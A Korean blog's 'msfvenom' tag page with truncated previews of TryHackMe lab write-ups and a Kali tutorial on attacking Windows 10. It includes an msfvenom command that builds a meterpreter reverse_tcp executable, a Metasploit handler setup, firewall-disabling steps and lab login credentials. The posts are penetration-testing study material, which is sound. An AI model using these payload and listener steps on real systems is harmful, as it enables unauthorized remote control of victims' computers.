msfvenom 3

TryHackMe | Relevant - OSCP 챌린지

TASK 1 Pre-Engagement Briefing  TASK 1 설명을 해석하자면 고객이 생산 환경 출시를 일주일 앞두고 침투 테스트를 요청했습니다. 다음과 같은 작업 범위가 있습니다:제공된 가상 환경에 대한 평가를 수행해야 합니다.최소한의 정보를 제공하며, 공격자의 관점(블랙박스 테스트)에서 진행해야 합니다.두 개의 플래그(User.txt, Root.txt)를 확보해야 합니다.수동적 공격을 우선적으로 시도하며, 모든 취약점을 찾아 기록해야 합니다.발견된 플래그를 대시보드에 제출해야 하며, 오직 할당된 IP 주소만 범위 내에 포함됩니다.모든 취약점을 찾아보고 보고해야 합니다.OSCP 시험 규칙처럼 되어있다 이번 CTF 로 공부좀 빡세게 해야겠다 PortScannmap -sV -sC -A 10.10...

TryHackMe | CTF 2024.10.20

TryHackMe | Windows PrivEsC 모의해킹 Task1,Task2

TASK 1 Deploy the Vulnerable Windows VM설명현재 이 랩은 다양한 권한 상승을 소개하는데 중점을 두고있습니다 Tib3rius 가 만들었고 Windows Privilege Escalation for OSCP and Beyond 중점을 둔 랩이라고 보시면 됩니다 RDP는 포트 3389에서 사용 가능해야 합니다 (서비스가 시작되기까지 몇 분이 걸릴 수 있습니다). "user" 계정으로 로그인하려면 비밀번호는 "password321"입니다 xfreerdp /u:user /p:password321 /cert:ignore /v:[IP]위와같이 들어가시면 됩니다 TASK 2  Generate a Reverse Shell Executable설명  오케이 좋습니다 이제 msfvenom 모듈을..

TryHackMe | CTF 2024.09.08

KALI LINUX | 윈도우 10 모의해킹 Reverse_tcp

Metasploit & msfvenom 활용해 윈도우 10 모의침투.윈도우 10 방화벽 설정 설정관리 메뉴 클릭 이와 똑같이 다 끄기 Msfvenom 설정아래와 같이 작성 msfvenom -p windows/meterpreter/reverse_tcp LHOST=자신의 IP LPORT=4444 -f exe > 파일이름.exe  이런식으로 뜨면 성공 !  msfvenom 으로 만든 악성파일이 보임. Metasploit 설정 메타스플로잇 실행 모듈 설정 msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp  msf6 exploit(multi/handler) > set payload /windows/meter..

카테고리 없음 2024.09.03